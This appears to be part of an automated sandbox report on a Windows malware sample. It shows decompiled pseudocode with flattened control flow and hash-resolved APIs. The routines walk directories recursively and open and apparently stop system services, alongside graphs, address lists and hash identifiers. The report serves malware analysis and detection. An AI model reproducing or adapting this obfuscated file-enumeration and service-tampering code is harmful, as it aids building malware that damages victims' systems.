								__eflags =  *0x7ae18c;
								if( *0x7ae18c == 0) {
									 *0x7ae18c = E007A3E60(_t64, E007A3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x7ae54c; // 0x8df0b0
									 *((intOrPtr*)(_t47 + 8)) = 0x7a7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x007a9868
                                                                                0x007a986a
                                                                                0x007a9871
                                                                                0x007a9875
                                                                                0x007a9875
                                                                                0x007a9878
                                                                                0x007a9880
                                                                                0x007a9880
                                                                                0x007a9880
                                                                                0x007a9880
                                                                                0x007a9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a988b
                                                                                0x007a9993
                                                                                0x007a9995
                                                                                0x007a99ad
                                                                                0x007a99ad
                                                                                0x007a99bb
                                                                                0x007a99bd
                                                                                0x007a99bf
                                                                                0x007a99c1
                                                                                0x007a99d8
                                                                                0x007a99c3
                                                                                0x007a99c3
                                                                                0x007a99c8
                                                                                0x007a99ce
                                                                                0x007a99ce
                                                                                0x00000000
                                                                                0x007a9891
                                                                                0x007a9891
                                                                                0x007a9896
                                                                                0x007a9936
                                                                                0x007a993b
                                                                                0x00000000
                                                                                0x007a9941
                                                                                0x007a9941
                                                                                0x007a9947
                                                                                0x007a9949
                                                                                0x007a9961
                                                                                0x007a9963
                                                                                0x007a9963
                                                                                0x007a9969
                                                                                0x007a997d
                                                                                0x007a997f
                                                                                0x007a9981
                                                                                0x007a9986
                                                                                0x00000000
                                                                                0x007a9986
                                                                                0x007a989c
                                                                                0x007a989c
                                                                                0x007a9927
                                                                                0x007a992c
                                                                                0x00000000
                                                                                0x007a98a2
                                                                                0x007a98a7
                                                                                0x007a9905
                                                                                0x007a990d
                                                                                0x007a9912
                                                                                0x007a991a
                                                                                0x00000000
                                                                                0x007a98a9
                                                                                0x007a98ae
                                                                                0x00000000
                                                                                0x007a98b4
                                                                                0x007a98b4
                                                                                0x007a98bb
                                                                                0x007a98ce
                                                                                0x007a98d3
                                                                                0x007a98d3
                                                                                0x007a98e4
                                                                                0x007a98ea
                                                                                0x007a98ef
                                                                                0x007a98f5
                                                                                0x007a98fb
                                                                                0x00000000
                                                                                0x007a98fb
                                                                                0x007a98ae
                                                                                0x007a98a7
                                                                                0x007a989c
                                                                                0x007a9896
                                                                                0x00000000
                                                                                0x007a988b
                                                                                0x007a99e2
                                                                                0x007a99e7
                                                                                0x007a9ae3
                                                                                0x007a9ae8
                                                                                0x007a9b02
                                                                                0x007a9b07
                                                                                0x007a9b09
                                                                                0x007a9b1c
                                                                                0x007a9b21
                                                                                0x007a9b21
                                                                                0x007a9b33
                                                                                0x007a9b35
                                                                                0x007a9b3e
                                                                                0x007a9b3e
                                                                                0x007a9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a99ed
                                                                                0x007a99ed
                                                                                0x007a9a73
                                                                                0x007a9a78
                                                                                0x007a9a7a
                                                                                0x007a9a8d
                                                                                0x007a9a92
                                                                                0x007a9a92
                                                                                0x007a9a99
                                                                                0x007a9a9b
                                                                                0x007a9aa0
                                                                                0x007a9aa2
                                                                                0x007a9ab5
                                                                                0x007a9aba
                                                                                0x007a9aba
                                                                                0x007a9ac7
                                                                                0x007a9ac9
                                                                                0x007a9ace
                                                                                0x007a9ad0
                                                                                0x007a9b4f
                                                                                0x007a9b58
                                                                                0x007a9ad2
                                                                                0x007a9ad2
                                                                                0x007a9ad9
                                                                                0x00000000
                                                                                0x007a9ad9
                                                                                0x007a99f3
                                                                                0x007a99f3
                                                                                0x007a99f8
                                                                                0x007a9a47
                                                                                0x007a9a49
                                                                                0x007a9a61
                                                                                0x007a9a61
                                                                                0x007a9a67
                                                                                0x007a9a69
                                                                                0x00000000
                                                                                0x007a99fa
                                                                                0x007a99fa
                                                                                0x007a99ff
                                                                                0x00000000
                                                                                0x007a9a05
                                                                                0x007a9a05
                                                                                0x007a9a0d
                                                                                0x007a9a12
                                                                                0x007a9a17
                                                                                0x007a9a1f
                                                                                0x007a9a24
                                                                                0x007a9a2c
                                                                                0x007a9a31
                                                                                0x007a9a38
                                                                                0x00000000
                                                                                0x007a9a38
                                                                                0x007a99ff
                                                                                0x007a99f8
                                                                                0x007a99ed
                                                                                0x00000000
                                                                                0x007a9aea
                                                                                0x007a9aea
                                                                                0x007a9aea
                                                                                0x007a9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,008DF098), ref: 007A997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 007A99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 007A9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 007A9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0
                                                                                • API String ID: 2382770032-4131004879
                                                                                • Opcode ID: ae943849803305ca40a0f78ef3f341c4f8ab0eda82ed8551e207be64189c1305
                                                                                • Instruction ID: 1e67264074efb2ac071107a0882bed6d5627b5e7040456641fe47546d0da9cb3
                                                                                • Opcode Fuzzy Hash: ae943849803305ca40a0f78ef3f341c4f8ab0eda82ed8551e207be64189c1305
                                                                                • Instruction Fuzzy Hash: 2E610830B083059BDB28AF68EC8976BB295D7D3704F10862DF206DB251EA3CDD15C7A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 818 7a38f0-7a390b 819 7a3910-7a3915 818->819 820 7a391b 819->820 821 7a3a69-7a3a6e 819->821 822 7a3a5f-7a3a64 820->822 823 7a3921-7a3926 820->823 824 7a3acc-7a3adf call 7a34c0 821->824 825 7a3a70-7a3a75 821->825 822->819 828 7a392c-7a3931 823->828 829 7a3a17-7a3a1e 823->829 846 7a3afc-7a3b17 824->846 847 7a3ae1-7a3af7 call 7a3f00 call 7a3e60 824->847 826 7a3ab6-7a3abb 825->826 827 7a3a77-7a3a7e 825->827 826->819 835 7a3ac1-7a3acb 826->835 831 7a3a9b-7a3ab1 827->831 832 7a3a80-7a3a96 call 7a3f00 call 7a3e60 827->832 836 7a3b70-7a3b77 828->836 837 7a3937-7a393c 828->837 833 7a3a3b-7a3a4f FindFirstFileW 829->833 834 7a3a20-7a3a36 call 7a3f00 call 7a3e60 829->834 831->819 832->831 843 7a3b97-7a3ba1 833->843 844 7a3a55-7a3a5a 833->844 834->833 841 7a3b79-7a3b8f call 7a3f00 call 7a3e60 836->841 842 7a3b94 836->842 837->826 845 7a3942-7a3947 837->845 841->842 842->843 844->819 852 7a394d-7a3953 845->852 853 7a39f1-7a3a12 845->853 867 7a3b19-7a3b2f call 7a3f00 call 7a3e60 846->867 868 7a3b34-7a3b3f 846->868 847->846 860 7a3974-7a3976 852->860 861 7a3955-7a395d 852->861 853->819 863 7a3978-7a398b call 7a34c0 860->863 864 7a396d-7a3972 860->864 861->864 871 7a395f-7a3963 861->871 880 7a39a8-7a39ec call 7a38f0 call 7a3460 863->880 881 7a398d-7a39a3 call 7a3f00 call 7a3e60 863->881 864->819 867->868 883 7a3b5c-7a3b6b 868->883 884 7a3b41-7a3b57 call 7a3f00 call 7a3e60 868->884 871->860 872 7a3965-7a396b 871->872 872->860 872->864 880->819 881->880 883->819 884->883
                                                                                C-Code - Quality: 63%
                                                                                			E007A38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x7ae430 == 0) {
								 *0x7ae430 = E007A3E60(_t56, E007A3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x7adba4;
								if(_t42 == 0) {
									_t42 = E007A3E60(_t56, E007A3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x7adba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E007A34C0(0x7ad290);
											_t50 =  *0x7ae158;
											if(_t50 == 0) {
												_t50 = E007A3E60(_t56, E007A3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x7ae158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E007A38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E007A3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E007A34C0(0x7ad260);
					_t24 =  *0x7ae158;
					if(_t24 == 0) {
						_t24 = E007A3E60(_t56, E007A3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x7ae158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x7ae494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E007A3E60(_t56, E007A3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x7ae494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x7adf30;
					if(_t28 == 0) {
						_t28 = E007A3E60(_t56, E007A3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x7adf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x7adf88;
						if(_t33 == 0) {
							_t33 = E007A3E60(_t56, E007A3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x7adf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x007a38fa
                                                                                0x007a38fc
                                                                                0x007a38fe
                                                                                0x007a3902
                                                                                0x007a3907
                                                                                0x007a3910
                                                                                0x007a3910
                                                                                0x007a3910
                                                                                0x007a3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a391b
                                                                                0x007a3a5f
                                                                                0x00000000
                                                                                0x007a3921
                                                                                0x007a3926
                                                                                0x007a3a1e
                                                                                0x007a3a36
                                                                                0x007a3a36
                                                                                0x007a3a48
                                                                                0x007a3a4a
                                                                                0x007a3a4f
                                                                                0x007a3ba1
                                                                                0x007a3a55
                                                                                0x007a3a55
                                                                                0x00000000
                                                                                0x007a3a55
                                                                                0x007a392c
                                                                                0x007a3931
                                                                                0x007a3b70
                                                                                0x007a3b77
                                                                                0x007a3b8a
                                                                                0x007a3b8f
                                                                                0x007a3b8f
                                                                                0x00000000
                                                                                0x007a3b95
                                                                                0x007a393c
                                                                                0x007a3ab6
                                                                                0x007a3abb
                                                                                0x00000000
                                                                                0x007a3acb
                                                                                0x007a3acb
                                                                                0x007a3acb
                                                                                0x007a3942
                                                                                0x007a3947
                                                                                0x007a39fd
                                                                                0x007a3a06
                                                                                0x007a3a0d
                                                                                0x007a394d
                                                                                0x007a3953
                                                                                0x007a3974
                                                                                0x007a3976
                                                                                0x00000000
                                                                                0x007a3978
                                                                                0x007a3982
                                                                                0x007a3984
                                                                                0x007a398b
                                                                                0x007a399e
                                                                                0x007a39a3
                                                                                0x007a39a3
                                                                                0x007a39bc
                                                                                0x007a39d8
                                                                                0x007a39dd
                                                                                0x007a39e2
                                                                                0x007a39e7
                                                                                0x007a39e7
                                                                                0x007a3955
                                                                                0x007a3955
                                                                                0x007a395d
                                                                                0x007a396d
                                                                                0x007a396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a395d
                                                                                0x007a3953
                                                                                0x00000000
                                                                                0x007a3947
                                                                                0x007a393c
                                                                                0x007a3926
                                                                                0x00000000
                                                                                0x007a391b
                                                                                0x007a3a6e
                                                                                0x007a3ad6
                                                                                0x007a3ad8
                                                                                0x007a3adf
                                                                                0x007a3af2
                                                                                0x007a3af7
                                                                                0x007a3af7
                                                                                0x007a3b0b
                                                                                0x007a3b0d
                                                                                0x007a3b12
                                                                                0x007a3b17
                                                                                0x007a3b2a
                                                                                0x007a3b2f
                                                                                0x007a3b2f
                                                                                0x007a3b36
                                                                                0x007a3b38
                                                                                0x007a3b3f
                                                                                0x007a3b52
                                                                                0x007a3b57
                                                                                0x007a3b57
                                                                                0x007a3b60
                                                                                0x007a3b62
                                                                                0x007a3b66
                                                                                0x00000000
                                                                                0x007a3a70
                                                                                0x007a3a75
                                                                                0x00000000
                                                                                0x007a3a77
                                                                                0x007a3a77
                                                                                0x007a3a7e
                                                                                0x007a3a91
                                                                                0x007a3a96
                                                                                0x007a3a96
                                                                                0x007a3aa1
                                                                                0x007a3aa5
                                                                                0x007a3aac
                                                                                0x00000000
                                                                                0x007a3aac
                                                                                0x007a3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 007A3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 6d84e48d1fd6c0448154f560f6c5ad0393240efaa7f13f31c5d9ccd5603ae9cd
                                                                                • Instruction ID: 188ecaf2276f7b5cfa545e5138d89b0580f85a70a30e6469b5075c676b1f9f8d
                                                                                • Opcode Fuzzy Hash: 6d84e48d1fd6c0448154f560f6c5ad0393240efaa7f13f31c5d9ccd5603ae9cd
                                                                                • Instruction Fuzzy Hash: EF5114717082418BCB34AF689849A7BB6A69BD3704F004B19F456C7391EA7DDF0583A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A5040, Relevance: 3.2, APIs: 2, Instructions: 248memoryserviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 951 7a5040-7a5057 952 7a505c 951->952 953 7a5060-7a5066 952->953 954 7a51af-7a51b5 953->954 955 7a506c 953->955 956 7a51bb 954->956 957 7a52f9-7a52ff 954->957 958 7a5072-7a5078 955->958 959 7a5367-7a536e 955->959 960 7a51c1-7a51c7 956->960 961 7a5277-7a527e 956->961 964 7a52e8-7a52ee 957->964 965 7a5301-7a5308 957->965 962 7a507a 958->962 963 7a50f9-7a50ff 958->963 966 7a538b-7a5396 959->966 967 7a5370-7a5386 call 7a3f00 call 7a3e60 959->967 968 7a526d-7a5272 960->968 969 7a51cd-7a51d3 960->969 974 7a529b-7a52c5 961->974 975 7a5280-7a5296 call 7a3f00 call 7a3e60 961->975 970 7a507c-7a5082 962->970 971 7a50c2-7a50c9 962->971 972 7a5153-7a515a 963->972 973 7a5101-7a5107 963->973 976 7a53b9-7a53c0 964->976 977 7a52f4 964->977 978 7a530a-7a5320 call 7a3f00 call 7a3e60 965->978 979 7a5325-7a5330 965->979 1001 7a5398-7a53ae call 7a3f00 call 7a3e60 966->1001 1002 7a53b3-7a53b6 966->1002 967->966 968->953 969->964 990 7a51d9-7a51e0 969->990 983 7a50ad-7a50c0 970->983 984 7a5084-7a508a 970->984 987 7a50cb-7a50e1 call 7a3f00 call 7a3e60 971->987 988 7a50e6-7a50e9 971->988 981 7a515c-7a5172 call 7a3f00 call 7a3e60 972->981 982 7a5177-7a5182 972->982 973->964 991 7a510d-7a5114 973->991 1016 7a52e2 974->1016 1017 7a52c7-7a52dd call 7a3f00 call 7a3e60 974->1017 975->974 977->952 978->979 1009 7a534d-7a535b RtlAllocateHeap 979->1009 1010 7a5332-7a5348 call 7a3f00 call 7a3e60 979->1010 981->982 1025 7a519f-7a51aa 982->1025 1026 7a5184-7a519a call 7a3f00 call 7a3e60 982->1026 983->953 984->964 996 7a5090-7a50ab call 7a42c0 984->996 987->988 1019 7a50ef-7a50f4 988->1019 1003 7a51fd-7a521f 990->1003 1004 7a51e2-7a51f8 call 7a3f00 call 7a3e60 990->1004 1005 7a5131-7a514e OpenServiceW 991->1005 1006 7a5116-7a512c call 7a3f00 call 7a3e60 991->1006 996->952 1001->1002 1002->976 1003->1019 1036 7a5225-7a522c 1003->1036 1004->1003 1005->952 1006->1005 1009->976 1027 7a535d-7a5362 1009->1027 1010->1009 1016->964 1017->1016 1019->952 1025->952 1026->1025 1027->952 1046 7a5249-7a5268 1036->1046 1047 7a522e-7a5244 call 7a3f00 call 7a3e60 1036->1047 1046->953 1047->1046
                                                                                C-Code - Quality: 64%
                                                                                			E007A5040(void* __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				short** _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t42;
				void* _t46;
				void* _t51;
				void* _t52;
				void* _t53;
				signed int _t54;
				void* _t59;
				short** _t102;
				void* _t104;
				signed int _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t113;
				void* _t116;
				void* _t117;

				_t102 = _v12;
				_t59 = 0;
				_v16 = __edx;
				_t113 = 0;
				_v20 = __ecx;
				_t105 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t116 = _t105 - 0x12f72f95;
						if(_t116 <= 0) {
							break;
						}
						__eflags = _t105 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t105 - 0x2fab56c4;
							if(_t105 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x7ae494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0x7facde30, _t113);
									 *0x7ae494 = _t17;
								}
								_t106 =  *_t17();
								__eflags =  *0x7add18;
								if( *0x7add18 == 0) {
									 *0x7add18 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0x9ff0609c, _t113);
								}
								_t16 = RtlAllocateHeap(_t106, 8, 0x20000); // executed
								_t59 = _t16;
								__eflags = _t59;
								if(_t59 != 0) {
									_t105 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x7ae484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E007A3E60(_t59, E007A3F00(0x26f5757c), 0x9e91db81, _t113);
									 *0x7ae484 = _t23;
								}
								 *_t23(_v24, 1, _t113, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x7ae18c;
								_t105 = (_t105 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E007A3E60(_t59, E007A3F00(0x26f5757c), 0x268fe5f0, _t113);
									 *0x7ae18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t105 - 0x1ca940c1;
								if(_t105 == 0x1ca940c1) {
									_t105 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t105 - 0x254bd927;
									if(_t105 != 0x254bd927) {
										L40:
										__eflags = _t105 - 0x1f0f293e;
										if(_t105 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t51 =  *0x7ae29c;
										__eflags = _t51;
										if(_t51 == 0) {
											_t51 = E007A3E60(_t59, E007A3F00(0x26f5757c), 0x4574c66, _t113);
											 *0x7ae29c = _t51;
										}
										_t52 =  *_t51(_v20, 0, 0x30, 3, _t59, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t52;
										if(_t52 == 0) {
											L13:
											_t105 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t53 =  *0x7ade08;
											__eflags = _t53;
											if(_t53 == 0) {
												_t53 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0xd8ef4c49, _t113);
												 *0x7ade08 = _t53;
											}
											_t54 =  *_t53();
											_t105 = 0x128dff18;
											_t104 = _t59 + (_t54 & 0x0000001f) * 0x2c;
											_t16 = _t59 + _v52 * 0x2c;
											__eflags = _t104 - _t16;
											_v68 = _t16;
											_t102 =  >=  ? _t59 : _t104;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t116 == 0) {
						_t29 =  *0x7ae494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0x7facde30, _t113);
							 *0x7ae494 = _t29;
						}
						_t108 =  *_t29();
						_t31 =  *0x7adf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0x5010a54d, _t113);
							 *0x7adf30 = _t31;
						}
						return  *_t31(_t108, 0, _t59);
					}
					_t117 = _t105 - 0x10f7fbef;
					if(_t117 > 0) {
						__eflags = _t105 - 0x11e09e52;
						if(_t105 == 0x11e09e52) {
							_t35 =  *0x7ae494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0x7facde30, _t113);
								 *0x7ae494 = _t35;
							}
							_t109 =  *_t35();
							_t37 =  *0x7adf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E007A3E60(_t59, E007A3F00(0x9bab0b12), 0x5010a54d, _t113);
								 *0x7adf30 = _t37;
							}
							 *_t37(_t109, 0, _t113);
							_t105 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t105 - 0x128dff18;
							if(_t105 != 0x128dff18) {
								goto L40;
							} else {
								__eflags =  *0x7ae270;
								if( *0x7ae270 == 0) {
									 *0x7ae270 = E007A3E60(_t59, E007A3F00(0x26f5757c), 0x56e230f9, _t113);
								}
								_t42 = OpenServiceW(_v20,  *_t102, 1); // executed
								__eflags = _t42;
								_v24 = _t42;
								_t105 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t117 == 0) {
							_t46 =  *0x7ae200;
							__eflags = _t46;
							if(_t46 == 0) {
								_t46 = E007A3E60(_t59, E007A3F00(0x26f5757c), 0x16d40839, _t113);
								 *0x7ae200 = _t46;
							}
							 *_t46(_v16, 1, _t113);
							goto L13;
						} else {
							if(_t105 == 0x5d498c4) {
								_t102 =  &(_t102[0xb]);
								__eflags = _t102 - _t16;
								asm("sbb esi, esi");
								_t105 = (_t105 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t105 != 0x8956eec) {
									goto L40;
								} else {
									_t113 = E007A42C0(_t59, 0x2000);
									_t105 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}







































                                                                                0x007a5047
                                                                                0x007a504b
                                                                                0x007a504d
                                                                                0x007a5051
                                                                                0x007a5053
                                                                                0x007a5057
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x007a5060
                                                                                0x007a5060
                                                                                0x007a5060
                                                                                0x007a5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a51af
                                                                                0x007a51b5
                                                                                0x007a52f9
                                                                                0x007a52ff
                                                                                0x00000000
                                                                                0x007a5301
                                                                                0x007a5301
                                                                                0x007a5306
                                                                                0x007a5308
                                                                                0x007a531b
                                                                                0x007a5320
                                                                                0x007a5320
                                                                                0x007a5327
                                                                                0x007a532e
                                                                                0x007a5330
                                                                                0x007a5348
                                                                                0x007a5348
                                                                                0x007a5355
                                                                                0x007a5357
                                                                                0x007a5359
                                                                                0x007a535b
                                                                                0x007a535d
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x00000000
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x007a535b
                                                                                0x007a51bb
                                                                                0x007a51bb
                                                                                0x007a5277
                                                                                0x007a527c
                                                                                0x007a527e
                                                                                0x007a5291
                                                                                0x007a5296
                                                                                0x007a5296
                                                                                0x007a52ac
                                                                                0x007a52b0
                                                                                0x007a52b2
                                                                                0x007a52bd
                                                                                0x007a52c3
                                                                                0x007a52c5
                                                                                0x007a52d8
                                                                                0x007a52dd
                                                                                0x007a52dd
                                                                                0x007a52e6
                                                                                0x00000000
                                                                                0x007a51c1
                                                                                0x007a51c1
                                                                                0x007a51c7
                                                                                0x007a526d
                                                                                0x00000000
                                                                                0x007a51cd
                                                                                0x007a51cd
                                                                                0x007a51d3
                                                                                0x007a52e8
                                                                                0x007a52e8
                                                                                0x007a52ee
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x00000000
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x007a51d9
                                                                                0x007a51d9
                                                                                0x007a51de
                                                                                0x007a51e0
                                                                                0x007a51f3
                                                                                0x007a51f8
                                                                                0x007a51f8
                                                                                0x007a521b
                                                                                0x007a521d
                                                                                0x007a521f
                                                                                0x007a50ef
                                                                                0x007a50ef
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x00000000
                                                                                0x007a505c
                                                                                0x007a5225
                                                                                0x007a5225
                                                                                0x007a522a
                                                                                0x007a522c
                                                                                0x007a523f
                                                                                0x007a5244
                                                                                0x007a5244
                                                                                0x007a5249
                                                                                0x007a524e
                                                                                0x007a525b
                                                                                0x007a525d
                                                                                0x007a525f
                                                                                0x007a5261
                                                                                0x007a5265
                                                                                0x00000000
                                                                                0x007a5265
                                                                                0x00000000
                                                                                0x007a521f
                                                                                0x007a51d3
                                                                                0x007a51c7
                                                                                0x007a51bb
                                                                                0x007a53c0
                                                                                0x007a53c0
                                                                                0x00000000
                                                                                0x007a53c0
                                                                                0x007a506c
                                                                                0x007a5367
                                                                                0x007a536c
                                                                                0x007a536e
                                                                                0x007a5381
                                                                                0x007a5386
                                                                                0x007a5386
                                                                                0x007a538d
                                                                                0x007a538f
                                                                                0x007a5394
                                                                                0x007a5396
                                                                                0x007a53a9
                                                                                0x007a53ae
                                                                                0x007a53ae
                                                                                0x00000000
                                                                                0x007a53b7
                                                                                0x007a5072
                                                                                0x007a5078
